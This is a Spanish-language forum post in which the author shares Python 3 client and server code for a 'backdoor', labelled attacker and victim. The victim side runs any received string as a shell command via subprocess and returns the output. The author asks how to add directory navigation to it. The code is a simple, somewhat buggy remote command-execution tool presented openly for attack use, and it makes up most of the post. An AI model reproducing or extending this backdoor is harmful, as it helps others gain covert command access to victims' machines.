he estado realizando una backdoor en python 3 la cual ha funcionado de un modo bueno (lo cual no me espere XD)
bueno aqui dejo el codigo de cliente/servidor que realice en este script
Cliente/ atacante:
Código
import socket, subprocess localhost = "127.0.0.1" port = 8080 datos = ('localhost', 8080) conexion = socket.socket(socket.AF_INET, socket.SOCK_STREAM) conexion.connect(datos) while True: msg = input(">> ") if msg == "exit": conexion.close() break else: conexion.send(msg.encode()) recibo = conexion.recv(10240) print(recibo.decode('ascii'))
Servidor/ Victima:
Código
import socket, subprocess localhost = "127.0.0.1" port = 8080 datos = ('localhost', 8080) conexion = socket.socket(socket.AF_INET, socket.SOCK_STREAM) conexion.bind(datos) conexion.listen(1) while True: conn,adr = conexion.accept() recibo = conn.recv(10240) if recibo == "": pass elif recibo == "exit": msg = "GoodBye Friend! :)" conn.send(msg.encode()) conn.close() break else: proc = subprocess.Popen([recibo], shell = True,stdout = subprocess.PIPE, stderr = subprocess.PIPE, universal_newlines = True) STDOUT, STDERR = proc.communicate() if not STDOUT: conn.send(STDERR.encode('ascii')) else: conn.send(STDOUT.encode('ascii'))
mi duda es la siguiente, este script permite realizar actividades en shell pero muy limitadas, lo que quiero realizar ahora es cambiar de directorio y poder sabes cual es el directorio actual, se que esto se puede realizar con el modulo OS pero mi duda es ¿Como lo hago? ¿tengo que crear el comando yo mismo como una funcion y llamarla a traves de input o de otro modo?.
De ante mano muchas gracias y que tengan buen dia